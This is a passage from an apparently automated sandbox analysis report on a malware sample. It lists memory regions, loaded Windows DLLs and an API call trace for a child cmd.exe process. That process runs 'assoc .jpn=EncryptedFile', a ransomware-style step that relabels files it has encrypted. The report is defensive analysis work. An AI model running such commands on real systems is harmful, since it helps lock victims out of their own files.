(normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2117 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2118 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2119 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2120 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2121 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2122 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2123 start_va = 0x680000 end_va = 0x680fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2124 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 2125 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2126 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2127 start_va = 0x6b0000 end_va = 0x6b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Thread: id = 160 os_tid = 0xfd8 Thread: id = 161 os_tid = 0x13bc Thread: id = 162 os_tid = 0x4f0 Thread: id = 163 os_tid = 0x4f8 Process: id = "23" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5cd0e000" os_pid = "0x8fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C assoc .jpn=EncryptedFile" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2175 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2176 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2177 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2178 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2179 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2180 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2181 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2182 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2183 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2184 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2185 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 2186 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2187 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2188 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2189 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2190 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 2191 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2192 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 2193 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2194 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2195 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2196 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2197 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2198 start_va = 0x5d0000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2199 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2200 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2201 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2202 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2203 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2285 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2286 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2287 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2288 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 2289 start_va = 0x500000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2290 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2291 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2292 start_va = 0x6ab60000 end_va = 0x6ab67fff monitored = 0 entry_point = 0x6ab61840 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 2293 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2294 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2295 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 2296 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2297 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2298 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2299 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2300 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2301 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2302 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2303 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2304 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2305 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2306 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2307 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2308 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 2309 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2310 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2311 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 2312 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2313 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2314 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2315 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2316 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2317 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2318 start_va = 0x9d0000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 2319 start_va = 0x4d60000 end_va = 0x615ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 2320 start_va = 0x6160000 end_va = 0x655afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006160000" filename = "" Region: id = 2321 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2322 start_va = 0x71ee0000 end_va = 0x71f54fff monitored = 0 entry_point = 0x71f19a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2323 start_va = 0xb60000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 2324 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2325 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 2326 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2327 start_va = 0xb60000 end_va = 0xbf0fff monitored = 0 entry_point = 0xb98cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2328 start_va = 0xca0000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Thread: id = 165 os_tid = 0xd20 [0271.552] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0271.552] __set_app_type (_Type=0x1) [0271.552] __p__fmode () returned 0x74ac4d6c [0271.552] __p__commode () returned 0x74ac5b1c [0271.552] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0271.553] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0271.553] GetCurrentThreadId () returned 0xd20 [0271.553] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd20) returned 0x84 [0271.553] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0271.553] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0271.554] SetThreadUILanguage (LangId=0x0) returned 0x409 [0271.565] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0271.565] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0271.566] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0271.566] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0271.566] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0271.566] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0271.566] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0271.566] GetConsoleOutputCP () returned 0x1b5 [0271.581] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0271.582] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0271.582] _get_osfhandle (_FileHandle=1) returned 0x3c [0271.582] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0271.600] _get_osfhandle (_FileHandle=1) returned 0x3c [0271.601] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0271.609] _get_osfhandle (_FileHandle=1) returned 0x3c [0271.609] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0271.616] _get_osfhandle (_FileHandle=0) returned 0x38 [0271.616] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0271.620] _get_osfhandle (_FileHandle=0) returned 0x38 [0271.620] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0271.631] GetEnvironmentStringsW () returned 0x747cf0* [0271.631] GetProcessHeap () returned 0x740000 [0271.631] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xa1a) returned 0x748718 [0271.631] FreeEnvironmentStringsA (penv="A") returned 1 [0271.631] GetProcessHeap () returned 0x740000 [0271.631] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x4) returned 0x740550 [0271.631] GetEnvironmentStringsW () returned 0x747cf0* [0271.631] GetProcessHeap () returned 0x740000 [0271.631] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xa1a) returned 0x749140 [0271.632] FreeEnvironmentStringsA (penv="A") returned 1 [0271.632] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0271.632] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0271.632] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0271.632] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0271.632] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0271.632] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0271.632] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0271.632] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0271.632] RegCloseKey (hKey=0x94) returned 0x0 [0271.632] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0271.633] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0271.633] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0271.633] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0271.633] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0271.633] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0271.633] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0271.633] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0271.633] RegCloseKey (hKey=0x94) returned 0x0 [0271.633] time (in: timer=0x0 | out: timer=0x0) returned 0x620b752b [0271.633] srand (_Seed=0x620b752b) [0271.633] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .jpn=EncryptedFile" [0271.633] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .jpn=EncryptedFile" [0271.633] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0271.633] GetProcessHeap () returned 0x740000 [0271.633] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x210) returned 0x749b68 [0271.634] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x749b70, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0271.634] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0271.634] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0271.634] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0271.634] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0271.634] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0271.634] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0271.634] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0271.634] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0271.634] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0271.634] _wcsicmp 